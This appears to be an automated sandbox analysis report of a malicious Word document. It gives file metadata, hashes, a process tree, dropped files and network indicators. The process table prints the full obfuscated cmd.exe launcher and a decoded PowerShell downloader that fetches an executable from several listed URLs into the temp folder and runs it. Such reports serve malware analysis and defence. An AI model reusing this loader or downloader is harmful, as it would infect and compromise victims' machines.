File name: | 3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a |
Full analysis: | https://app.any.run/tasks/88dd88aa-5198-48ed-9c06-8e0a1de038a6 |
Verdict: | Malicious activity |
Analysis date: | January 10, 2019, 14:53:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 10 16:20:00 2018, Last Saved Time/Date: Mon Dec 10 16:20:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0 |
MD5: | 3250C02D2B234C6E346DA65EC5B6E1F7 |
SHA1: | E7F828C025BBC3FB6C959CE61C6B384712C58235 |
SHA256: | 3B3DCE32F973F3754B3F4C06C9C1274232776E3795EB8AF038F8E06B5F513A0A |
SSDEEP: | 1536:Gt81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9slK1T5SU2T/:08GhDS0o9zTGOZD6EbzCdN15SUi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 13 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 12 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:10 16:20:00 |
CreateDate: | 2018:12:10 16:20:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3b3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3940 | c:\wYAuLnHwQ\OPkulkQKDpm\FBZbkIHdJsHiS\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2504 | CmD /V:/C"set FTuo=AFiHrhSoSijXZqdKrqucHOMtdIWldDC.+8V\2kB;fP{a =)1'@sRT36G4gLpY/}xEwNQbne0-$m(v9yz,:&&for %9 in (73,79,67,26,45,48,21,5,65,48,39,73,15,67,79,45,69,70,65,72,7,68,10,70,19,23,44,66,70,23,31,26,70,68,30,27,9,70,69,23,39,73,25,58,16,45,48,5,23,23,59,81,61,61,65,65,65,31,9,19,43,16,79,7,69,70,31,19,7,74,61,55,70,59,19,36,9,12,49,5,23,23,59,81,61,61,50,43,69,23,43,78,43,31,69,70,23,61,26,47,26,38,71,38,18,41,53,67,49,5,23,23,59,81,61,61,9,69,69,7,76,43,28,31,69,27,61,50,36,60,55,34,30,17,70,49,5,23,23,59,81,61,61,16,7,68,65,43,27,27,50,31,19,7,74,61,54,19,8,56,22,15,77,34,79,49,5,23,23,59,81,61,61,50,19,7,23,23,74,43,79,79,43,31,19,7,74,61,19,59,12,34,55,15,25,79,68,48,31,8,59,27,9,23,75,48,49,48,46,39,73,29,11,0,45,48,51,8,67,48,39,73,68,67,34,44,45,44,48,47,54,47,48,39,73,50,34,23,45,48,74,10,52,48,39,73,9,41,10,45,73,70,69,76,81,23,70,74,59,32,48,35,48,32,73,68,67,34,32,48,31,70,63,70,48,39,40,7,16,70,43,19,5,75,73,34,58,15,44,9,69,44,73,25,58,16,46,42,23,16,78,42,73,15,67,79,31,29,7,65,69,27,7,43,28,1,9,27,70,75,73,34,58,15,80,44,73,9,41,10,46,39,73,51,9,7,45,48,9,8,8,48,39,25,40,44,75,75,55,70,23,72,25,23,70,74,44,73,9,41,10,46,31,27,70,69,57,23,5,44,72,57,70,44,33,71,71,71,71,46,44,42,25,69,76,7,37,70,72,25,23,70,74,44,73,9,41,10,39,73,64,69,18,45,48,10,16,68,48,39,68,16,70,43,37,39,62,62,19,43,23,19,5,42,62,62,73,10,5,79,45,48,10,10,41,48,39,91)do set f1by=!f1by!!FTuo:~%9,1!&&if %9 equ 91 echo !f1by:~-437!|FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^^^|findstr ellX')DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2636 | C:\Windows\system32\cmd.exe /S /D /c" echo $zQW='Ohw';$KQz=new-object Net.WebClient;$ILr='http://www.icarzone.com/Gepc2iZ@http://santaya.net/W1WB0BuP3Q@http://innovad.nl/s2YGVCqe@http://robwalls.com/6cS4MK9Vz@http://scottmazza.com/cpZVGKIzb'.Split('@');$DXA='RSQ';$bQV = '161';$sVt='mjT';$iPj=$env:temp+'\'+$bQV+'.exe';foreach($VLK in $ILr){try{$KQz.DownloadFile($VLK, $iPj);$Rio='iSS';If ((Get-Item $iPj).length -ge 80000) {Invoke-Item $iPj;$Enu='jrb';break;}}catch{}}$jhz='jjP';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2676 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.4zXs tokens=4" %m IN ('assoc^|findstr ellX') DO %m -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3108 | C:\Windows\system32\cmd.exe /c assoc|findstr ellX | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3336 | C:\Windows\system32\cmd.exe /S /D /c" assoc" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3392 | findstr ellX | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
932 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6F9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6B2US3NFZGYOAQYMKLSR.temp | — | |
MD5:— | SHA256:— | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:633EDCAF70A08EA4C8F9489679EF5BF4 | SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f560.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$3dce32f973f3754b3f4c06c9c1274232776e3795eb8af038f8e06b5f513a0a.doc | pgc | |
MD5:D9730EFA14D4FDE28CB149566B99EE93 | SHA256:265EE606B57FD179B52B185B2FCC6096C8C278C722422BA7529509AEA3C853C7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
932 | powershell.exe | GET | — | 103.41.233.137:80 | http://www.icarzone.com/Gepc2iZ | CN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
932 | powershell.exe | 103.41.233.137:80 | www.icarzone.com | Cloud Computing Corporation | CN | malicious |
Domain | IP | Reputation |
---|---|---|
www.icarzone.com |
| malicious |